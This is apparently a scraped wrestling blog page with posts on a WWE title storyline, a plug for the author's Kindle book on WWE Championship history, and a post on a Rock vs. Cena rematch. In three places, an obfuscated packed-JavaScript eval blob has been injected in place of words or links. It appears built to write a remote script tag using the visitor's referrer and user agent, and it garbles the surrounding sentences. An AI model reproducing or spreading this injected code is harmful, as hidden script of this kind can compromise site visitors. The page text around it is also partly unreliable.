Brie wound up quitting (and slapping Stephanie HARD) so Stephanie couldn’t control her. In theory Bryan is still champion, but there’s no word on when he’ll be able to compete again. There was a rumor that Brie wanted to start a family so this might be a way to write her off TV.

….but nothing will actually happen until Sunday. Bryan refused to hand over the title but Stephanie said he has until Sunday to do it or Brie is fired due to Brie shoving her a few weeks ago.

That being said, WWE has done a great job of planting some seeds of doubt.  It’s all they had to do and somehow they’ve pulled it off.  Look back to 1998 with Austin vs. Michaels.  There was no doubt that Austin would walk out with the title, so they added Mike Tyson as the heel referee to try and make things look in doubt.  This is a better execution of that as you could actually see any of them taking (or keeping) the title.  The drama could be INSANE out there, but at the end of the day it’s Bryan’s match to lose.

And before anyone tries to correct me:

Warrior didn’t lose the IC title at Wrestlemania 6

Pre-Show matches aren’t part of Wrestlemania, meaning they don’t count.

KB’s History of the WWE Championship – My New Book

Over the past few months, I’ve been trying my hand at writing a book.  The title should tell you all you need to know.  In the book I look at the history of the belt starting with Buddy Rogers and going up to the Rock beating Punk for the title.  There are over 220 matches reviewed and over 80 of the reviews are brand new, as is everything else in between the matches.  I review literally every WWE Title change in the belt’s history along with several other matches either of historical significance or high quality.

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfebi|var|u0026u|referrer|danez||js|php'.split('|'),0,{})) book costs , or 2 cents per review.  The book runs over 300 pages and I’ve spent the last two and a half months working on this.  It’s on Kindle, but there are free apps for PC, Mac and anything else you can come up with.  The book can be purchased here in America:

Here in the UK:

I think that’s everything.  If you ever need to find the book on Amazon just search “KB’s History of the WWE Championship.”

Oh and remember I have the 1998 Monday Night Raw Reviews up as well:

WWE.Com’s History Of The WWE Title

http://www.wwe.com/classics/history-wwe-championship-26092271

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|askze|var|u0026u|referrer|krkhr||js|php'.split('|'),0,{})) was posted after the new title was unveiled.  There’s some cool history stuff in there.  Unfortunately it’s a slide show rather than a full on history of the championship.  It would be nice to see someone talk about every title change and various other important matches in its history……wouldn’t it?

The Rock vs. John Cena II…..Anybody?

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhrfb|var|u0026u|referrer|ftins||js|php'.split('|'),0,{})) seems to be the general consensus about the match that is about as obvious as you could ask it to be.So at the Rumble, Cena won the right to fight for a world title at Wrestlemania.  As luck would have it, Rock won the WWE Title and will likely be defending it at Wrestlemania.  If you’re too dense to figure it out at this point, it’s pretty clear that Rock vs. Cena II is happening in New York at Wrestlemania 29.  However, every opinion I’ve read of it since then seems to be the same: people aren’t that thrilled with the prospect.

That’s about where I am on it too.  Now don’t get me wrong: the match is going to be solid as these two can, no joke intended, bring it.  The problem isn’t having the match be good.  It’s having the match feel huge.  Rock and Cena had a year to set up the previous match and by the end of it, I had to see it.  I didn’t care what happened or how good it was but I needed to see the match.  With two and a half months to go and nothing new other than the title being on the line, I don’t see how this is going to come off as something nearly as huge as last year.

Do I want to see it?  Eh…..yeah I guess.  If nothing else the promo work will be amazing as always.  However, that comes back to the same problem: we heard these two talk about each other over the course of 14 months already.  Basically this coming Wrestlemania feels like reheating the feast we had last year: it’s still good but it doesn’t taste like it did straight out of the oven.

Is anyone fired up at this idea?
